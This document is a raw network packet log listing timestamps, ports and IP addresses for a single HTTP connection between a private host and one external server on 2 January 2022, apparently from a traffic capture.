Jan 2, 2022 02:28:02.897692919 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897728920 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897738934 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.897770882 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897804976 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.897809982 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897849083 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897886992 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897916079 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.897923946 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897970915 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898013115 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898020983 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898032904 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898066998 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898086071 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898124933 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898158073 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898163080 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898204088 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898233891 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898241997 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898281097 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898283005 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898323059 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898354053 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898372889 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898401976 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898438931 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898451090 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898478031 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898507118 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.898518085 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.898601055 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.903913975 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904047012 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904048920 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904108047 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904140949 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904146910 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904186964 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904210091 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904227972 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904264927 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904301882 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904306889 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904341936 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904372931 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904378891 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904414892 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904417038 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904454947 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904489994 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904491901 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904530048 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904567003 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904572964 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904603958 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904634953 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904643059 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904679060 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904680967 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904717922 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904755116 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904756069 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904792070 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904828072 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904839039 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904887915 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904889107 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904927015 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904963970 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.904963970 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.904989004 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.905046940 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992523909 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992588997 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992640018 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992696047 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992710114 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992753983 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992760897 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992765903 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992767096 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992825031 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992832899 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992891073 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.992906094 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992955923 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.992957115 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993006945 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993006945 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993066072 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993071079 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993124008 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993125916 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993175030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993177891 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993226051 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993227005 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993275881 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993287086 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993341923 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993347883 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993400097 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993402004 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993452072 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993460894 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993511915 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993514061 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993561983 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993563890 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993618011 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993614912 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993685007 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993725061 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993736982 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993738890 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993788004 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993793011 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993839025 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993886948 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993901014 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993931055 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993940115 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.993943930 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.993998051 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994008064 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994062901 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994066954 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994113922 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994121075 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994165897 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994172096 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994216919 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994224072 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994267941 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994271040 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.994321108 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.994375944 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.996907949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.996999025 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997112989 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997124910 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997127056 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997240067 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997241974 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997344017 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997376919 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997459888 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997530937 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997582912 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997612000 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997646093 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997649908 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997695923 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997709990 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997745037 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997770071 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997797012 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997809887 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997859001 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997860909 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.997935057 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.997972965 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998025894 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998040915 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998075962 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998090982 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998127937 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998142004 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998178959 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998193026 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998229980 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998245001 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998281956 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998297930 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998332977 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998347044 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998383999 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998399019 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998435020 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998460054 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998487949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998496056 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998538971 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998554945 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998589993 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998605013 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998641014 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998657942 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998694897 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998708963 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998747110 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998759985 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998797894 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998814106 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998848915 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998864889 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998900890 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998908997 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.998951912 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.998965979 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999002934 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999017000 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999057055 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999072075 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999108076 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999123096 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999159098 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999172926 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999208927 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999223948 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999259949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999274015 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999310970 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999325037 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999361992 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999376059 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999413013 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999419928 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999463081 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999476910 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999514103 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999528885 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999564886 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999574900 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999617100 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999659061 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.999665976 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.999679089 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003202915 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003289938 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003330946 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003384113 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003398895 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003412962 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003417969 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003424883 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003457069 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003498077 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003508091 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003516912 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003528118 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003547907 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003597021 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003597975 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003622055 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003629923 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003663063 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003664017 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003695011 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003703117 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003727913 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003735065 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003770113 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003771067 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003803968 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003812075 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003854036 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003854990 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003884077 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003895998 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003952026 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.003962994 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.003998041 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004010916 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004019022 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004040956 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004095078 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004096985 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004107952 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004127026 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004168987 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004199982 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004204035 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004247904 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004267931 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004278898 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004307032 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004313946 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004345894 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004348040 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004365921 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004379034 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004405975 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004412889 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004436970 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004446983 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004470110 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004475117 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004493952 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004503012 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004534006 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004559040 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004565954 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004594088 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004599094 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004628897 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004631996 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004662037 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004664898 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004688025 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004697084 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004726887 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004729033 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004749060 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004760981 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004791975 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004795074 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004822016 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004828930 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004862070 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004883051 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004894972 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004914999 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004944086 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004946947 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.004961967 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.004980087 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005007029 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005012035 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005040884 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005043030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005070925 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005075932 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005089045 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005106926 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005137920 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005140066 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005156994 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.005170107 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.005204916 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.092658043 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.092730999 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.092783928 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.092835903 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.092927933 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093004942 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093038082 CET	80	49835	147.189.137.168	192.168.2.6
